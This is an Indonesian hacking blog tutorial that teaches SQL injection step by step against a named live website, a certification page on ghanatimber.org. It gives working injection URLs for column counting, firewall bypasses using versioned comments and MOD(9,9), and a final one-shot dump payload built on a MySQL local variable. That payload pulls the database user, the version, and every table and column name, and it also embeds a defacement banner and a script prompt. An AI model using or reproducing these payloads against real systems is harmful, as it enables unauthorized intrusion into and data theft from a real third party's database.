Sql Local Variable

oke guys kembali lagi bersama saya ./numb_404 lebih tepatnya sering dipanggil aqil.

kali ini saya mau membahas tentang sql local variable !

kalo ga tau apa itu local variable cari di google aja,banyak.

nahh saya kasih live target oke.

live target => https://www.ghanatimber.org/certification_details.php?id=12

pada tampilan awal terlihat seperti ini.

jangan hiraukan iklan dibawah okee

 

setiap pengertian dan cara inject sudah saya jelaskan di SQL Postgre, mulai dari,

1.apa itu tanda petik(') serta kegunaanya.

2.apa itu (--+-) serta kegunaannya.

3.apa itu (ORDER BY) serta kegunaanya.

4.apa itu (UNION SELECT) serta kegunaanya.

ºººWARNINGººº

jika tidak tau dari 1-4 point di atas, dipastikan kalian lihat Toturial SQL postgre yang saya buatkan materinya.

LANJUT

https://www.ghanatimber.org/certification_details.php?id=12

oke kita coba inject

=>https://www.ghanatimber.org/certification_details.php?id=12'

oke error dan ini tampilannya

sekarang kita coba kasih url balancernya yaitu (--+-) 
nahh tampilannya sama aja, di Materi Postgre sudah saya bilang (Tidak semua web bisa di injections dengan adanya tanda petik (')

oke kita hapus tanda petiknya (') dan jadinya begini,
=>https://www.ghanatimber.org/certification_details.php?id=12--+-

dan tampilannya itu seperti ini
kok forbidden bang ?
yups kalian bisa ganti url pakai (%23) nahh sekarang kita coba liat tampilannya 😁

nahkan normal, jika kalian  bertanya bagaimana saya mendapatkan url balancer itu, kalian bisa inject di DH Hackbar dan disitu cari aja URL Balancer.

oke lanjut
(ORDER BY)
https://www.ghanatimber.org/certification_details.php?id=12 ORDER BY 1%23
dan kita liat tampilannya
kok forbidden bang ?
nahh oke kita bypass aja Tinggal tambahkan (ASC) di depan angka 1

jadinya seperti ini
=> https://www.ghanatimber.org/certification_details.php?id=12 ORDER BY 1 ASC%23

Dan kita lihat tampilannya
Nah kan normal, jika kalian sudah liat materi postgre yang saya buat pasti kalian tau apa itu ORDER BY.

ok lanjut

pada ORDER BY kali ini errornya diangka (9) dan normal diangka (8)

kalian bisa liat perbedaannya,cek screen shootnya

Angka 9


Angka 8

oke target kita ada di angka 8 dan tinggal UNION SELECT, jika kalian tidak tau apa itu UNION SELECT maka kalian diwajibkan untuk melihat materi postgre.

LANJUT

*UNION SELECT*

=> https://www.ghanatimber.org/certification_details.php?id=12 AND 0 UNION SELECT 1,2,3,4,5,6,7,8%23

dan ini tampilannya

lah kok tampilannya forbidden bang?
oke Union Selectnya kita bypass
PERHATIKAN

/*!50000UNION*/ SELECT_ jadinya seperti ini
=> https://www.ghanatimber.org/certification_details.php?id=12 AND 0 /*!50000UNION*/ SELECT 1,2,3,4,5,6,7,8%23

lahh kok masih forbidden bang ?
yups oke di AND 0 nahh di angka 0 kita hapus dan ganti menjadi MOD(9,9)

dan jadinya seperti ini
=>https://www.ghanatimber.org/certification_details.php?id=12 AND MOD(9,9) /*!50000UNION*/ SELECT 1,2,3,4,5,6,7,8%23

dan lihat tampilannya

Error


dan setelah di kasih MOD(9,9)

dan boom keluar angka 5 dan 3

silahkan tampel dios kalian di angka 5 atau 3

Lah kok masih Error bang ?
oke sesuai judul kita akan menggunakan Local variable.
=>dh hackbar
=>Local variable, posisinya ada disebelah DIOS
=> and@dh:=()
and-nya jangan lupa di ganti div atau or
nahh tampel itu di sebelah MOD(9,9) OKE jadinya seperti ini

=> https://www.ghanatimber.org/certification_details.php?id=12 AND MOD(9,9) div@dh:=() /*!50000UNION*/ SELECT 1,2,3,4,5,6,7,8%23
nah di (@dh) itu ganti aja terserah kalian 

contoh=> https://www.ghanatimber.org/certification_details.php?id=12 AND MOD(9,9) div@terserah:=() /*!50000UNION*/ SELECT 1,2,3,4,5,6,7,8%23

LANJUT

dan tampel dios kalian di div@terserah:=().
di dalam kurung jadinya gini div@terserah:=(dios kalian)

lalu tekan execute(pengguna dh)

loh kok diosnya ga ada bang ?

kok angka ajaibnya masih ada bang ?


nah panggil dios kalian

cara=> di angka togel yaitu 5/3 kalian hapus dan ketik (@terserah)


nahh jadinya gini

=> https://www.ghanatimber.org/certification_details.php?id=12 AND MOD(9,9) div@terserah:=(/*!50000concat/**8**/*/(0x3c62723e,0x3c7363726970743e70726f6d707428227b202e2f6e756d625f343034207d222c646f63756d656e742e646f6d61696e293c2f7363726970743e,0x3C696D67207372633D2268747470733A2F2F672E746F7034746F702E696F2F705F323030327175336266302E6A70656722206865696768743D223930222077696474683D223930223E,0x3c666f6e7420636f6c6f723d22726564223e3c623e,0x494E4A4543544544204259202E2F6E756D625F343034,0x3c2f623e,0x3c2f666f6e743e,0x3c62723e,0x557365723a3a,current_user,0x3c62723e,0x56657273696f6e3a3a,version(),0x3c62723e,0x44617461626173653a3a,database/*data*//**8**/(),0x3c62723e,0x3c62723e,(select(@x)/*!50000from/**8**/*/(/*!50000select/**8**/*/(@x:=0x00),(select(0)/*!From/**8**/*/(/*!50000information_schema.columns/**8**/*/)/*!50000where/**8**/*/(table_schema=database/*data*//**8*/())and(0x00)in(@x:=/*!50000coNcat/**8**/*/(@x,0x3c6c693e,/*!50000table_name/**8**/*/,0x3a3a,/*!50000column_name/**8**/*/))))x))) /*!50000UNION*/ SELECT 1,2,3,4,@terserah,6,7,8%23

dan boom liat tampilannya

sekian materi local variable kali ini ya guys
Saya ./numb_404 

Materi by = ./numb_404

Oke selamat baca dan pelajari
Mohon maap jika ada salah kata dlam materi atau kata

Jangan lupa cek materi lain di blog Bomber-Cyber-Army dan bakal ada materi² new yang bermanfaat bagi kalian. 


0 Response to "Sql Local Variable"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel